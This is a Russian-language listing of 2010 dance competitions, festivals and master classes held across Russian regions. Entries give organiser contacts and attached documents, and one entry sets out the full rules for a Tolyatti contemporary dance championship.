Тел.: (+7-812) 717-13-32, (+7-812) 922-54-82

Моб.: +7-905-276-40-97

Эл. почта: ralifs@yandex.ru

05.11.2010—05.11.2010 "Невский мотив" Конкурс театров мод и модельных агенств Ленинградская область
Санкт-Петербург
Конкурс

г. Санкт-Петербург, ул. Полтавская, д.12, оф. 137

Культурный центр ГУВД Санкт-Петербурга

Тел.: (+7-812) 717-13-32, (+7-812) 922-54-82

Моб.: +7-905-276-40-97

Эл. почта: ralifs@yandex.ru

konkurs-moda.doc

05.11.2010—05.11.2010 "Отражение" Всероссийский конкурс по модерну и джазу Ленинградская область
Санкт-Петербург
Всероссийский конкурс

г. Санкт-Петербург, ул. Полтавская, д.12, оф. 137

Культурный центр ГУВД Санкт-Петербурга

Тел.: (+7-812) 717-13-32, (+7-812) 922-54-82

Моб.: +7-905-276-40-97

Эл. почта: ralifs@yandex.ru

Международный конкурс Санкт-Петербург 4-6 ноября 2010 года.doc

04.11.2010—06.11.2010 "Индийская радуга" 2 Международный конкурс исполнителей индийских танцев Ленинградская область
Санкт-Петербург
Международный конкурс

г. Санкт-Петербург, ул. Полтавская, д.12, оф. 137

Культурный центр ГУВД Санкт-Петербурга

Тел.: (+7-812) 717-13-32, (+7-812) 922-54-82

Моб.: +7-905-276-40-97

Эл. почта: ralifs@yandex.ru

2 Международный конкурс индийских танцев.doc

04.11.2010—06.11.2010 "Творцы и хранители" IV Всероссийский семинар-практикум по Русскому танцу Ленинградская область
Санкт-Петербург

г. Санкт-Петербург, ул. Полтавская, д.12, оф. 137

Культурный центр ГУВД Санкт-Петербурга

Тел.: (+7-812) 717-13-32, (+7-812) 922-54-82

Моб.: +7-905-276-40-97

Эл. почта: ralifs@yandex.ru

Открытый Всероссийский семинар-практикум по русскому танцу 4-6 ноября 2010.doc

04.11.2010—05.11.2010 "Хоровод" Всероссийский конкурс русского танца (народный и стилизация) Ленинградская область
Санкт-Петербург
Всероссийский конкурс

г. Санкт-Петербург, ул. Полтавская, д.12, оф. 137

Культурный центр ГУВД Санкт-Петербурга

Тел.: (+7-812) 717-13-32, (+7-812) 922-54-82

Моб.: +7-905-276-40-97

Эл. почта: ralifs@yandex.ru

Международный конкурс Санкт-Петербург 4-6 ноября 2010 года.doc

04.11.2010—04.11.2010 "В ритмах степа" Всероссийский кнкурс Ленинградская область
Санкт-Петербург
Всероссийский конкурс

г. Санкт-Петербург, ул. Полтавская, д.12, оф. 137

Культурный центр ГУВД Санкт-Петербурга

Тел.: (+7-812) 717-13-32, (+7-812) 922-54-82

Моб.: +7-905-276-40-97

Эл. почта: ralifs@yandex.ru

Международный конкурс Санкт-Петербург 4-6 ноября 2010 года.doc

03.11.2010—03.11.2010 Открытая Всероссийская конференция в области хореографии. В работе конференции принимает участие Президент CID UNESCO. Ленинградская область
Санкт-Петербург

Всероссийская конференция по хореографии 3 ноября 2010 Спб.doc

01.11.2010—02.11.2010 V Юбилейный Чемпионат по современным танцевальным направлениям "DANCE RING" Нижегородская область
Нижний Новгород
Рейтинг А

Данс Ринг_участникам_2010.doc

01.11.2010—02.11.2010 Чемпионат по современным танцевльным напрвлениям "DANCE RING" Нижегородская область
Нижний Новгород
Рейтинг А

Проспект Данс Ринг-2010.doc

30.10.2010—31.10.2010 Кубок Ростовской области по Народному танцу и Фламенко.Чемпиотат Таганрога по Танцевальному шоу. .Открытый городской турнир по С Ростовская область
Таганрог
Областной конкурс

Кузюбердина Елена 8 906 416 30 20

lena-karnaval@mail.ru
30.10.2010—31.10.2010 "Аль-Салам" Международный конкурс, Oriental (восточный танец) Ленинградская область
Санкт-Петербург
Международный конкурс

г. Санкт-Петербург, ул. Полтавская, д.12, оф. 137

Культурный центр ГУВД Санкт-Петербурга

Тел.: (+7-812) 717-13-32, (+7-812) 922-54-82

Моб.: +7-905-276-40-97

Эл. почта: ralifs@yandex.ru

29.10.2010—31.10.2010 V Чемпионат по современным танцам «Dance Ring», Все направления Нижегородская область
Нижний Новгород
Рейтинг Б

Цылина Майя — Президент НТФ

Тел.: +7-831-466-34-44, моб. +7-902-681-92-90

29.10.2010—31.10.2010 Межвузовская студенческая Олимпиада искусств (вокал, хореография, театр мод, народные инструменты, литературный жанр, цирковая э Нижегородская область
Нижний Новгород
Олимпиада

— Цылина Майя — Президент НТФ

Тел.: +7-831-466-34-44, моб. +7-902-681-92-90

— Баринова Лариса — председатель комитета по сценическим танцам

Моб.: +7-903-604-04-80

24.10.2010—24.10.2010 Открытый турнир по современным танцевальным направлениям Саратовская область
Саратов

E-mail  : Ekzersis-pro@yandex.ru

тел: (8 8452) 93-58-08 - Ольга Орлова

ПОЛОЖЕНИЕ  24 октября 2010г..doc

23.10.2010—24.10.2010 Чемпионат ЮФО по Классическом танцу. Первенство ЮФО среди детей по Танцевальному шоу Первенство Ростова среди детей и юниоров п Ростовская область
Ростов-на-Дону
Рейтинг Б

Плюхина Елена 8 928 157 34 86

orhid-studio@yandex.ru

17.10.2010—10.09.2010 Региональный ФЕСТИВАЛЬ ИСКУССТВ "Осенний марафон" Тульская область
Тула
Областной конкурс

Организатор Чекмазова Ольга тел.8-903-421-88-88

e-mail:remix@tula.net

факс 8-4872-21-34-18

16.10.2010—17.10.2010 Фестиваль искусств "Осенний марафон". Тульская область
Тула
Областной конкурс

+7-903-421-88-88  remix@tula.net  Ольга Чекмазова 

 

16.10.2010—17.10.2010 Чемпионат Ростова на Дону по Оriental Ростовская область
Ростов-на-Дону
Первенство города

Лавриненко Людмила 8 902 341 28 52

16.10.2010—16.10.2010 Мастер-класс от P.FLY (Paul Buenzi) Ростовская область
Ростов-на-Дону
Мастер-класс
Регистрация по телефонам (863)243-22-13, 8918-531-5001, 8904-504-8-777 e-mail: mcrostov@narod.ru

Приглашение на Пи Флая.doc

15.10.2010—18.10.2010 2-я Дальневосточная танцевальная олимпиада Хабаровский край
Хабаровск
Олимпиада
Руководитель представительства ОРТО ФТСР в ДФО Яловой Сергей Епифанович 89622864630, 89241060356, факс 84212425607 yalovoy@email.kht.ru yalovoy_se@mail.ru

Пол2-я ДВТО.doc

Пол2-яДВТО,ДВFesT,Прил№4,Пол.doc

Пол2-яДВТО,ДВFesT,Прил№5,Вост 1.doc

Пол2-яДВТО,ДВFesT,Прил№6,Заявка.doc

Пол2-яДВТО,ДВFesT,Прил№9,Конгресс.doc

ИНФО МК Н.Гусевой.doc

Протоколы 2-я ДВТО.rar

03.10.2010—03.10.2010 ОБУЧАЮЩАЯ СЕССИЯ от ведущих педагогов. Ростовская область
Ростов-на-Дону
Мастер-класс
Справки по телефону: 8 903 402 67 55 Анжелика

ОБУЧАЮЩАЯ СЕССИЯ от ведущих педагогов[1].doc

03.10.2010—03.10.2010 Конкурс "Исида" ОРТО открывает сезон, Oriental (восточный танец) Ленинградская область
Санкт-Петербург
Конкурс

г. Санкт-Петербург, ул. Полтавская, д.12, оф. 137

Культурный центр ГУВД Санкт-Петербурга

Тел.: (+7-812) 717-13-32, (+7-812) 922-54-82

Моб.: +7-905-276-40-97

Эл. почта: ralifs@yandex.ru

02.10.2010—03.10.2010 Кубок Ростовской области по хип-хопу.Открытый городской турнир по СТН Ростовская область
Батайск
Областной конкурс

Ткаченко Михаил  8 909 428 74 03

Петровская Оксана      8 960 465 72 13

oksana.petrovska@mail.ru

24.09.2010—05.06.2011 ЮБИЛЕЙНЫЙ КАЛЕНДАРЬ НИЖЕГОРОДСКОГО РЕГИОНА НА 2010-2011 УЧ.Г. Нижегородская область
Нижний Новгород
Всероссийский конкурс

календарь НТФ_2010-2011 г.г..doc

12.09.2010—12.09.2010 «Спорт-tame» (х/х; х/х-баттлы; belly dance-баттлы) Нижегородская область
Нижний Новгород
Городской Кубок

— Цылина Майя — Президент НТФ

Тел.: +7-831-466-34-44, Моб. +7-902-681-92-90

— Виктор Рисков — вице-президент НТФ, Председатель комитета по Street Dance

Моб. +7-905-662-85-42

04.09.2010—04.09.2010 Общее ежегодное собрание членов Танцевальной организации Ростовской области Ростовская область
Ростов-на-Дону
Конвенция

Кривчук Александр 8 918 508 98 99

 

Кривчук Ирина 8 918 508 89 00

 

Петровская Оксана 8 960 465 72 13
27.07.2010—10.08.2010 Летний лагерь в г.Далянь (Китай) Хабаровский край
Хабаровск

Руководитель представительства ОРТО в ДФО   Яловой Сергей, 89622864630 ,

 

Организатор Котух Наталья, 84212638060.

www    dv-dance.ru

faride-club@mail.ru

new-wave.txt.pdf

10.07.2010—12.07.2010 Международный конгресс парных танцев (сальса) Ленинградская область
Санкт-Петербург
Конгресс

г. Санкт-Петербург, ул. Полтавская, д.12, оф. 137

Культурный центр ГУВД Санкт-Петербурга

Тел.: (+7-812) 717-13-32, (+7-812) 922-54-82

Моб.: +7-905-276-40-97

Эл. почта: ralifs@yandex.ru

27.06.2010—27.06.2010 Конкурс современных танцев "Жаркие ритмы" Амурская область
Благовещенск
Межрегиональный Кубок

Руководитель представительства ОРТО в ДФО,   Яловой Сергей, 89622864630 ,

yalovoy@email.kht.ru,  yalovoy_se@mail.ru

 

Организатор, Президент Амурского танцевального союза, региональный представитель   Друкер Бронислав

675028, Амурская область, г.Благовещенск,

 

89246741422

Bronislav.G.2009@mail.ru

Положение Жаркие ритмы 2010.doc

Приложение №3 Жаркие ритмы 2010, Заявка.doc

12.06.2010—12.06.2010 ПЕРВЫЙ ОТКРЫТЫЙ ЧЕМПИОНАТ ФЕДЕРАЦИИ СОВРЕМЕННОГО ТАНЦА ГОРОДСКОГО ОКРУГА ТОЛЬЯТТИ Самарская область
Тольятти
Первенство города
ПЕРВЫЙ ОТКРЫТЫЙ ЧЕМПИОНАТ ФЕДЕРАЦИИ СОВРЕМЕННОГО ТАНЦА ГОРОДСКОГО ОКРУГА ТОЛЬЯТТИ. 12 июня  2010 года ·         Танцевальное  шоу·         Классический танец ·         Эстрадный танец·         Народный  танец(1-восточный танец, 2-народный танец, фламенко, 3-стилизованный танец) ·         Парное  шоу  (аргентинское танго, латиноамериканское шоу, бродвей , хастл, сальса)·         Джаз, модерн·         Акробатический танец (шоу, акробатический)·         Мажоретки (баннеры, помпоны, флаги, барабаны)·         Танцевальный черлидинг·         Ансамбли танца·         Степ·         Уличные танцы 1. Место проведения:  спорт-клуб «Дэвис», ул. Спортивная 19   www.avtograd-tennis.ru2.Возраст участников:           ·         Дети – 99 год рождения и моложе·         Юниоры – 95-98 годов рождения·         Взрослые – 94 год рождения и старше·         Синьоры – 50  лет и старшеПримечание: а) В малых группах и формейшн допускается участие танцоров только предыдущей возрастной категории, но не более 50 % от всего состава группы или формейшн. -В номинации «Танцевальное шоу» малая группа и формейшн допускается участие танцоров старшей возрастной категории, но не более 20% от общего числа участников.-В дуэтах допускается участие танцора предыдущей возрастной категории при условии, что в следующем танцевальном году танцор переходит в данную возрастную категорию.б) В номинации «Продакшн» ограничения по возрасту нет.в) В каждой номинации  танцевальный коллектив может представить  одну композицию. Дополнительные номера принимаются при внесении дополнительного стартового взноса, но не более двух в номинации.3. Номинации:-Танцы-     ·         Соло (девочки/девушки; мальчики/юноши)·         дуэты/пары                                ·         малые группы (3-7 человек)·         мини-продакшн (3-12 чел.) Допускается участие танцоров смешанных возрастов.·         формейшн (8-24 человека)·         продакшн (более 24 участников) 4. Время композиции ·         Соло, дуэт/пара – максимум 2.40 мин.·         Малая группа – максимум 3.30 мин.·         Формейшн – максимум 4.30 мин.·         Продакшн – максимум 6.00 мин.      Время композиции (для номинации акробатический танец)·         Соло – максимум 1.45 мин.·         Дуэт/пара – максимум 2.00 мин.·         Малая группа – максимум 3.00 мин.·         Формейшн – максимум 3.45 мин.      Время композиции (для джаза и модерна)·         Соло – максимум 4.00 мин.·         Дуэт/пара – максимум 4.30 мин.·         Группа – максимум 6.00 мин.                                       Маневренный фонд- 15-20 секунд.Носители: мини и CD.  1 мелодия на одном носителе. Имейте дубликат записи! RW и MP3 не принимаются.Внимание: в случае превышения положенного времени композиции, выступление участника может быть прервано оргкомитетом мероприятия (музыка будет микширована) Конкурс является открытым конкурсом  для всех участников  из Самарской области. 5. Критерии оценки: Все участники оцениваются по трём позициям:
- техника исполнения
- композиция / хореография
- имидж
      -шоу(только для танцевального шоу)Техника исполнения — точность в технике исполнения, соответствие стилю, уровень сложности, оригинальность, возможности танцора исполнить характерные особенности выбранной танцевальной техники, качество исполнения, ритм, синхронность при исполнении танца двойками, парами, группами или  формейшн (продакшн).Композиция / хореография — выбор танцевальных элементов и их композиция, фигуры, вариация; использование танцевальной площадки; взаимодействие друг с другом; вариативность и оригинальность использования различных связок, линий и т. д.Имидж — самовыражение, презентация, контакт со зрителем, костюм, выражение задуманной идеи в танцевальной композиции, реквизит, макияж и т. д.Шоу – зрелищность номера По каждой позиции судья ставит баллы от 1 до 10, где 1 — минимальная оценка, а 10 — максимальная и наилучшая оценка. В конце каждого тура судья должен подсчитать общую сумму и расставить их по местам. 1-е место – лучшее. Сумма мест всех членов жюри будет являться итогом.  Примечание: - каждый руководитель участвующих школ, клубов и коллективов имеет право ознакомиться со всем пакетом судейской конкурсной документации после окончания конкурса, а так же системой начисления очков и их суммирования в общую таблицу определения победителей.-по окончании каждого этапа предполагается проведение «Круглого стола» для членов жюри и руководителей участвовавших коллективов. 6. Финансовые условия. Все расходы на организацию осуществляются за счет благотворительных стартовых взносов.Стартовый взнос – 300 руб. с человека (для членов ОРТО – 150 руб. при предъявлении книжки с оплаченным годовым взносом за 2010 год) за танцевальную дисциплину. Для тех, кто танцует только  малые группы, мини - продакшн, формейшн – 200 рублей с человека за дисциплину.  Дополнительный номер оплачивается как отдельная дисциплина. За продакшн –3000 руб. с коллектива. Вход для зрителей платный 200 рублей на отборочные туры и 500 рублей на гала концерт. Права на видео и фотосъемку принадлежат организатору мероприятия. Видео и фотосъемка мероприятия разрешается оргкомитетом на платной основе (300 руб.) РЕГИСТРАЦИЯ.7. Заявки: принимаются до 24 часов 20 мая  2010 г.  в письменной форме по адресу:Тольятти ул. Дзержинского 25А, ТД "ЛИНН"

Телефон: (8482) 461253, 89277848905

Электропочта:
federaciyatancev@mail.ru Регистрация коллективов на конкурс - строго заранее, в день конкурса коллективы будут регистрироваться при условии внесения двойного стартового взноса.Заявки на проживание, питание для приезжих коллективов принимаются на электронный адрес.8. Проживание: оргкомитет поможет с размещением, проживанием, трансфертом при наличии заявки до 20 мая  2010 года. Заявки на проживание, питание для приезжих коллективов принимаются на e-mail  federaciyatancev@mail.ru, muzactive@gmail.com. Стоимость проживания: с удобствами на этаже 350 руб. на чел.Есть своя столовая. Принимаются заказы на завтраки, обеды, ужины.  Коллективы могут самостоятельно решать вопросы с размещением и трансфертом.    9. Призовой фонд: медали, кубки, дипломы, участие в теле-проекте.10. Жюри: из состава ведущих специалистов Самарской области (5-7 человек). 11.Оргкомитет:       Организатор конкурса:                                      Директор конкурса: Маритьянова Екатерина Вячеславовна              Потапова Анна Викторовна тел.   461253                                                          тел. 613149 е-mail: federaciyatancev@mail.ru                         е-mail: muzactive@gmail.comФорма заявки.1.     Город2.     Название коллектива3.     Ф.И.О. руководителя4.     Дисциплина5.     Возрастная группа6.     Количественная группа7.     Название номера, хронометраж8.     Ф.И. солистов и дуэтов\пар9.     Контактные телефоны (рабочий, домашний, мобильный) e-mail, почтовый адрес.Всем участникам иметь с собой документ, подтверждающий возрастную категорию

_________ __ 12.06[1].doc

12.06.2010—12.06.2010 Чемпионат по стриту, х/х-баттлы (улица) Нижегородская область
Нижний Новгород
Городской Кубок

Виктор Рисков — вице-президент НТФ, Председатель комитета по Street Dance

Моб. +7-905-662-85-42Б

12.06.2010—12.06.2010 Международный фестиваль ЮНЕСКО «Сделано в России». Чемпионат России среди регионов Москва
Москва
Чемпионат России
11.06.2010—12.06.2010 Искусство, Гран-При Поволжья.docx Республика Мордовия
Саранск
Кубок главы города

Искусство, Гран-При Поволжья.doc

11.06.2010—12.06.2010 "Гран - При Поволжья", 11-12 июня, г. Саранск Республика Мордовия
Саранск

Raspisanie_na_11-12_iunq.xls

11.06.2010—12.06.2010 Гран-при Поволжья Республика Мордовия
Саранск
Кубок главы города

Полное Положение Кубка Саранска.doc

11.06.2010—12.06.2010 Полное Положение Кубка Саранска Республика Мордовия
Саранск
Рейтинг Б

Полное Положение Кубка Саранска.doc

08.06.2010—30.06.2010 Фестиваль фестивалей «Золотой дождь» (творческая смена на базе ДОЛ «Дружба») /вокал, хореография,театр Нижегородская область
Нижний Новгород

www.ortodance.ru
www.artsfera.org


Цылина Майя — Президент НТФ

Тел.: +7-831-466-34-44

Моб. +7-902-681-92-90

 

06.06.2010—18.04.2010 6 июня. Уфа. Всероссийский Танцевальный Форум-2010. Республика Башкортостан
Уфа
Всероссийский конкурс
6 июня. Уфа. "Всероссийский танцевальный форум-2010".

ПОЛОЖЕНИЕ ТАНЦ. ФОРУМА.doc

03.06.2010—06.06.2010 Летние курсы «Арт-сфера» / судейский конгресс. Нижегородская область
Нижний Новгород
Мастер-класс
www.ortodance.ru
www.artsfera.org

Эл. почта: artsferann@rambler.ru
30.05.2010—30.05.2010 Дню защиты детей посвящается. Фестиваль-конкурс Международной детской лиги Восточного танца Москва
Москва
Фестиваль
30.05.2010—30.05.2010 Фестиваль детского творчества «Мурзилки» (вокал, хореография, детская мода)/до 8 лет Нижегородская область
Нижний Новгород
Фестиваль

Цылина Майя — Президент НТФ

Тел.: +7-831-466-34-44, моб. +7-902-681-92-90

29.05.2010—30.05.2010 "1001 БЕЛАЯ НОЧЬ" Рейтинг России А, Oriental (восточный танец). Дети, юниоры, взрослые, профессионалы Ленинградская область
Санкт-Петербург
Рейтинг А

г. Санкт-Петербург, ул. Полтавская, д.12, оф. 137

Культурный центр ГУВД Санкт-Петербурга

Тел.: (+7-812) 717-13-32, (+7-812) 922-54-82

Моб.: +7-905-276-40-97

Эл. почта: ralifs@yandex.ru

29.05.2010—29.05.2010 "Звездный mix" - концерт Лучших коллективов НТФ в ККЗ, Нижегородская область
Нижний Новгород

Цылина Майя — Президент НТФ

Тел.: +7-831-466-34-44, моб. +7-902-681-92-90

29.05.2010—29.05.2010 Всероссийский конкурс театров мод и модельных агентств «ТАЛАНТЫ» ГРАН-ПРИ «БЕЛЫЕ НОЧИ САНКТ- ПЕТЕРБУРГА» Ленинградская область
Санкт-Петербург
Всероссийский конкурс

г. Санкт-Петербург, ул. Полтавская, д.12, оф. 137

Культурный центр ГУВД Санкт-Петербурга

Тел.: (+7-812) 717-13-32

Моб.: +7-905-276-40-97

Эл. почта: ralifs@yandex.ru

Всероссийский  конкурс театров мод Таланты 29 мая.doc

29.05.2010—29.05.2010 Всероссийский конкурс "Таланты" ГРАН-ПРИ «БЕЛЫЕ НОЧИ САНКТ- ПЕТЕРБУРГА» Ленинградская область
Санкт-Петербург
Всероссийский конкурс

г. Санкт-Петербург, ул. Полтавская, д.12, оф. 137

Культурный центр ГУВД Санкт-Петербурга

Тел.: (+7-812) 717-13-32, (+7-812) 922-54-82

Моб.: +7-905-276-40-97

Эл. почта: ralifs@yandex.ru

Всероссийский конкурс Таланты 29 мая 2010 года.doc

29.05.2010—29.05.2010 Концерт лучших коллективов Москвы и Московской области Best of the Best Москва
Москва
23.05.2010—23.05.2010 Четвертый открытый регион. конкурс по современным и спортивным танц. направлениям "Денс - Микс". Кубок ЦФО по танцевальному шоу. Тульская область
Тула
Региональный Кубок
  • Чекмазова Ольга Юрьевна
  • тел.8-903-421-88-88
  • remix@tula.net
  • Баринова Татьяна Вячеславовна
  • тел. 8-910-160-85-58

polozhenie.doc

22.05.2010—23.05.2010 Российский турнир по современным танцевальным направлениям "Кубок ТСК "Максима-2010" Волгоградская область
Волгоград
Рейтинг Б

Нагов Вячеслав

Тел.: +7-927-504-33-24

Эл. почта: TSK-maxima81@mail.ru

ПРОГРАММА турнира 22-23 мая 2010 г..doc

ПОЛОЖЕНИЕ турнира 22-23 мая 2010 г..doc

16.05.2010—16.05.2010 "Всеволожская весна" Открытое первенство Ленинградской области Ленинградская область
Санкт-Петербург
Первенство области

г. Санкт-Петербург, ул. Полтавская, д.12, оф. 137

Культурный центр ГУВД Санкт-Петербурга

Тел.: (+7-812) 717-13-32, (+7-812) 922-54-82

Моб.: +7-905-276-40-97

Эл. почта: ralifs@yandex.ru

15.05.2010—16.05.2010 Российский Фестиваль «Таланты-2010», Гран-при г. Нижнего Новгорода, 2 этап (все направления) Нижегородская область
Нижний Новгород
Фестиваль

www.artsfera.org

www.ortodance.ru


Тел.: (+7-831) 466-34-44

Моб.: +7-903-604-04-80

Эл. почта: artsferann@rambler.ru

30.04.2010—10.05.2010 7-я Всемирная танцевальная Олимпиада Москва
Москва
Чемпионат Мира
29.04.2010—01.05.2010 Мастер-класс Анны Ломакиной(Новая Зеландия). Камчатский край
Петропавловск-Камчатский

Руководитель представительства ОРТО в ДФО, Яловой С.Е., 89622864630, yalovoy@email.kht.ru

Руководитель студии "Нар"  Генералова Евгения, 89622168517.

je_ka@rambler.ru

29.04.2010—29.04.2010 шоу-программа "МАГИЯ ТАНЦА" школы-студии "Ниагара" Воронежская область
Воронеж

рук. школы-студии Оксана Черняева, г. Воронеж, ДК 50-летия Октября, тел. (4732) 90-10-20

pilon_magia.jpg

26.04.2010—26.04.2010 Мастер-класс Анны Ломакиной(Новая Зеландия).Парные танцы Амурская область
Благовещенск
Руководитель представительства ОРТО в ДФО Яловой Сергей, 89622864630, yalovoy@email.kht.ru
Руководитель представительства ОРТО в АО  Друкер Бронислав, 89246741422,
Bronislav.g.2009@mail.ru
25.04.2010—25.04.2010 Чемпионат по современным танцам «Весенняя радуга» на кубок мэра г.Дзержинска Нижегородская область
Нижний Новгород
Региональный Кубок

www.artsfera.org

www.ortodance.ru


Тел.: (+7-831) 466-34-44

Моб.: +7-905-663-10-78

Эл. почта: artsferann@rambler.ru

25.04.2010—25.04.2010 Праздник танца Дансинг Патти Хабаровский край
Хабаровск
Руководитель представительства ОРТО в ДФО Яловой С.Е., 89622864630, yalovoy@email.kht.ru

Положение.doc

Дансинг 2.doc

Приложение№1(заявка на ТШ).doc

Приложение№2 (парные танцы ).doc

24.04.2010—25.04.2010 Региональный турнир по танцевальному шоу, Street Show, народному тану, акробатическому танцу и черлидингу -"Экзерсис-PRO" Саратовская область
Саратов
Региональный Кубок

Председатель правления СРОО «ФЭСТ» Орлова Алевтина Анатольевна

Тел.: (+7-8452) 53-85-10


Организатор: Ольга Орлова
Тел.: (+7-8452) 93-58-08


Тел./Факс: (+7-8452) 305-433

Эл. почта: ekzersis-pro@yandex.ru

ПОЛОЖЕНИЕ 24, 25 апреля 2010г..doc

ПОЛОЖЕНИЕ 24, 25 апреля 2010г..doc

24.04.2010—24.04.2010 Фестиваль -конкурс восточных танцев "Звезда Востока 2010" Хабаровский край
Хабаровск
Межрегиональный Кубок

Руководитель представительства ОРТО в ДФО   Яловой Сергей, 89622864630 ,

Организатор Котух Наталья, 84212638060.

www    dv-dance.ru

faride-club@mail.ru

ПОЛОЖЕНИЕ 1.doc

23.04.2010—23.04.2010 Курсы повышения квалификации для педагогов ДФО Хабаровский край
Хабаровск

Руководитель представительства ОРТО в ДФО, Организатор   Яловой Сергей, 89622864630 ,

yalovoy@email.kht.ru,  yalovoy_se@mail.ru

МК Анны Ломакиной.doc

Форма №13 для ОРТО печ. Аттестация судей, клубов, счетных.doc

Инфо по курсам и аттестации.doc

1-е ДВ курсы повышения квалификации 2.doc

23.04.2010—23.04.2010 Мастер-класс Анны Ломакиной(Новая Зеландия).Парные танцы Хабаровский край
Хабаровск

МК Анны Ломакиной 3.doc

17.04.2010—17.04.2010 4 Открытый областной Чемпионат по современным танцам "Dance Сollection" на Кубок главы администрации г.Волхова Ленинградская область
Санкт-Петербург
Кубок главы города

г. Санкт-Петербург, ул. Полтавская, д.12, оф. 137

Культурный центр ГУВД Санкт-Петербурга

Тел.: (+7-812) 717-13-32, (+7-812) 922-54-82

Моб.: +7-905-276-40-97

Эл. почта: ralifs@yandex.ru

Положение Кубок главы МО г.Волхов 2010.doc

16.04.2010—18.04.2010 Российский Конкурс-Фестиваль «4 сезона» Нижегородская область
Нижний Новгород
Фестиваль
www.artsfera.org
www.ortodance.ru

Тел.: (+7-831) 466-34-44
Моб.: +7-902-681-92-90
Эл. почта: artsferann@rambler.ru
16.04.2010—18.04.2010 Фестиваль современных танцев Камчатский край
Петропавловск-Камчатский
Межрегиональный Кубок

Руководитель представительства ОРТО в ДФО,  Яловой Сергей, 89622864630 ,

yalovoy@email.kht.ru,  yalovoy_se@mail.ru

Организатор Генералова Евгения

683006, Камчатский край, г.Петропавловск-Камчатский, пр.Победы 57, 34

89146222743,  89622168517

je_ka@rambler.ru 

 

Камчатка положение.doc

14.04.2010—15.04.2010 Мастер-классы по парным танцам Пуэро Кубано Хабаровский край
Хабаровск
Мастер-класс
Руководитель представительства ОРТО в ДФО Яловой Сергей Епифанович 89622864630, факс 8421242560 yalovoy@email.kht.ru, yalovoy_se@mail,ru Организатор руководитель клуба Сальса Вива -Ольга Иванова

Мастер-классы Пуэро Кубано.jpg

11.04.2010—11.04.2010 Обучающий фестиваль-конкурс «ДЕБЮТ» по хип-хоп, диско, техно, хаус, электрик, Street show, 3-й этап Москва
Москва
Фестиваль
10.04.2010—25.04.2010 Кубок Черноземья Воронежская область
Воронеж
Региональный Кубок

Ольга Челомбиева: тел. (4732) 94-23-77, е-mail: olga@fly-net.ru. Орг. комитет: (4732)  94-23-32

КубЧер полож. 2010.doc

10.04.2010—10.04.2010 Обучающий фестиваль-конкурс «ДЕБЮТ» для начинающих танцоров по танцевальному шоу, 3-й этап Москва
Москва
Фестиваль
10.04.2010—10.04.2010 "Киришская мозаика" Кубок главы г.Кириши Ленинградская область
Санкт-Петербург
Кубок главы города

г. Санкт-Петербург, ул. Полтавская, д.12, оф. 137

Культурный центр ГУВД Санкт-Петербурга

Тел.: (+7-812) 717-13-32, (+7-812) 922-54-82

Моб.: +7-905-276-40-97

Эл. почта: ralifs@yandex.ru

10.04.2010—10.04.2010 ТРЕТИЙ ФЕСТИВАЛЬ-КОНКУРС ПО ВОСТОЧНЫМ ТАНЦАМ "ЗОЛОТОЙ СКАРАБЕЙ - 2010" г.Тула 10 апреля 2010 года Тульская область
Тула
Фестиваль

Большакова Светлана Вячеславовна 8-920-744-34-49;

Zolotoy_Skarabey_2010_Polozhenie.doc

Zolotoy_Skarabey_2010_Raspisanie.doc

09.04.2010—11.04.2010 Международный конкурс-фестиваль по восточному танцу "Магия", отборочный Чемпионат Поволжья среди взрослых Нижегородская область
Нижний Новгород
Рейтинг А

МеждународныйПОЛОЖЕнИЕ_2010.doc

04.04.2010—04.04.2010 Гран-При Московского региона по Восточным танцам, 2-й этап Москва
Москва
Региональный Кубок
04.04.2010—04.04.2010 Чемпионат и Первенство Орловской области по всем танцевальным направлениям Орловская область
Орел
Первенство области

Тел.: (+7-4862) 750-815

Моб.: +7-903-882-32-38

Эл. почта: mina_78@list.ru

04.04.2010—04.04.2010 Московский фестиваль искусств, 4-й этап Москва
Москва
Фестиваль
03.04.2010—03.04.2010 YEYA в Астрахани СЕМИНАР 3-го апреля Астраханская область
Астрахань
Мастер-класс

YEYA.doc

03.04.2010—03.04.2010 Фестиваль-конкурс "Таланты" Орла и Орловской области 2-ой этап Орловская область
Орел
Областной конкурс

Тел.: (+7-4862) 750-815

Моб.: +7-903-882-32-38

Эл. почта: mina_78@list.ru

02.04.2010—04.04.2010 Пятый Юбилейный Всероссийский Фестиваль-конкурс исполнителей современной хореографии "Прикамский Олимп 2010" Пермский край
Пермь
Рейтинг А

прикамский олимп положение.doc

27.03.2010—27.03.2010 Чемпионат России и фестиваль по Street Show Москва
Москва
Рейтинг А
Чемпионат России
Фестиваль
27.03.2010—27.03.2010 Фестиваль «Таланты» по сценическим и парным танцам, 3-й этап Москва
Москва
Фестиваль
27.03.2010—27.03.2010 Открытый Чемпионат Северо-Западного округа Москвы по современным танцевальным направлениям и спортивной хореографии World Dance Москва
Москва
Городской Кубок
25.03.2010—26.03.2010 Конгрессы по народным и классическому танцам Москва
Москва
Конгресс
25.03.2010—26.03.2010 Научно-практическая конференция «Танцы как терапия и как средство реабилитации» Москва
Москва
Конгресс
20.03.2010—21.03.2010 Чемпионат Москвы по Belly Dance классике, фолку и шоу Москва
Москва
Рейтинг А
20.03.2010—21.03.2010 фестиваль-конкурс современных танцев "Танцевальный Олимп 2010" Хабаровский край
Хабаровск
Межрегиональный Кубок

Руководитель представительства ОРТО в ДФО, Организатор   Яловой Сергей, 89622864630 ,

yalovoy@email.kht.ru,  yalovoy_se@mail.ru

Положение ТО 2010.pdf

20.03.2010—20.03.2010 "Танцевальная палитра"- Всеросийский конкурс "Гран-при санкт-Петербурга" Ленинградская область
Санкт-Петербург
Всероссийский конкурс

г. Санкт-Петербург, ул. Полтавская, д.12, оф. 137

Культурный центр ГУВД Санкт-Петербурга

Тел.: (+7-812) 717-13-32, (+7-812) 922-54-82

Моб.: +7-905-276-40-97

Эл. почта: ralifs@yandex.ru

Танцевальная палитра 20 марта 2010.doc

20.03.2010—20.03.2010 Открытый Кубок г.Санкт-Петербурга по черлидингу и спортивной хореографии (акробатический танец,мажоретки,черлидинг) Ленинградская область
Санкт-Петербург
Городской Кубок

г. Санкт-Петербург, ул. Полтавская, д.12, оф. 137

Культурный центр ГУВД Санкт-Петербурга

Тел.: (+7-812) 717-13-32, (+7-812) 922-54-82

Моб.: +7-905-276-40-97

Эл. почта: ralifs@yandex.ru

Положение-СпортХореогр-20.03.doc

19.03.2010—19.03.2010 Аттестация судей СЗФО по черлидингу и спортивной хореографии (акробатический танец,мажоретки,черлидинг) Ленинградская область
Санкт-Петербург

г. Санкт-Петербург, ул. Полтавская, д.12, оф. 137

Культурный центр ГУВД Санкт-Петербурга

